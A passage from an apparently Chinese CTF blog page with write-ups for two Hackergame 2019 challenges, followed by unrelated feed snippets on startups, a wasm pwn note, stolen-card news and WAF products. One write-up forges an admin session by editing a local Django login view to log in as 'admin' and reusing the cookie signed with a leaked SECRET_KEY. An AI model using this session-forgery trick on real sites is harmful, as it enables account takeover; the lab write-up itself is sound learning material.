1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 from django.contrib.auth.models import User def index(request): if request.method == "GET": if request.user.is_authenticated: return redirect(reverse("profile")) return render(request, 'app/index.html', { # "name": "admin" "name": name }) elif request.method == "POST": username = request.POST["username"] password = request.POST["password"] user = authenticate(request, username=username, password=password) if user is not None: # login(request, user) u = User.objects.get(username='admin') # 添加这行和下一行 login(request, u)

其中修改的是

1 2 u = User.objects.get(username='admin') # 添加这行和下一行 login(request, u)

这两行会在用户使用guest登录的时候仍然返回admin的信息，因为这个cookie信息是经过secert_key签名了的，所以在题目服务器里面也可以用

复制这个cookie到题目里面，重下新请求一下就给flag了

1 flag{Never_leak_your_sEcReT_KEY}

最初以为是泄露secert_key导致RCE，但是试了之后发现不行 然后尝试构造cookie，分析django源码里面cookie的逻辑 稍微有点麻烦懒得去看，试了试本地直接让程序使用admin登录，然后把cookie放到线上题目里面，访问得flag

三教奇妙夜

拆开视频成图片

1 ffmpeg -i output.mp4 frame_%09d.jpg

文件比较多 观察了一下无用图片的大小都在5000B左右，含有flag的页面大小不同，于是可以边写边删

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 In [36]: def delete(): ...: count = 0 ...: for i in os.listdir('night'): ...: count += 1 ...: if 4969<os.path.getsize('night/'+i)<5100: ...: os.remove('night/'+i) ...: In [36]: for i in range(1000000): ...: delete() ...: time.sleep(10) ...: print("again", i) ...: ...:

打开就看到flag了

1 flag{ViDe0_prOcE55_with_program_1s_eaSy} 附录

官方writeup https://github.com/ustclug/hackergame2019-writeups

单位经济效益是个充满争议的话题。有些人对它嗤之以鼻，有些人奉为最高准则。中学生都会计算；投资界大佬也时常挂在嘴边谆谆教诲；而有些创业者听到此问题会倍觉尴尬，常顾左右而言他。

Polyfill 写作dubai-ctf，然而在阿布扎比举办233 风格迥异，被毛子吊锤一百遍啊一百遍 第二天主要在看一个wasm的pwn，发现了UAF的漏洞但是由于对heap没了解所以没写利用。队里的pwn手觉得没法用所以没写，最后偷了流量重发爽了一天。赛中修复了题目，但是并没有起效。事后分析了一下确实是那个UAF的洞。 题目文件 http是一个web演示接口，可以通过html+js+engin...

There’s something ironic about cybercriminals getting “hacked back.” BriansClub, one of the largest underground stores for buying stolen credit card...

The post Hack-ception: Benign Hacker Rescues 26M Stolen Credit Card Records appeared first on McAfee Blog.

一年前备考CISSP的一点点经验。

MLSRC邀你来参加白帽极客节

上月，Gartner 刚发布了 WAF 魔力象限报告。美国初创公司Signal Sciences进入到远见者象限，这也是它首次入选。Signal Sciences是下一代WAF的倡导者，今天在此就其WAF产品做一简单分享。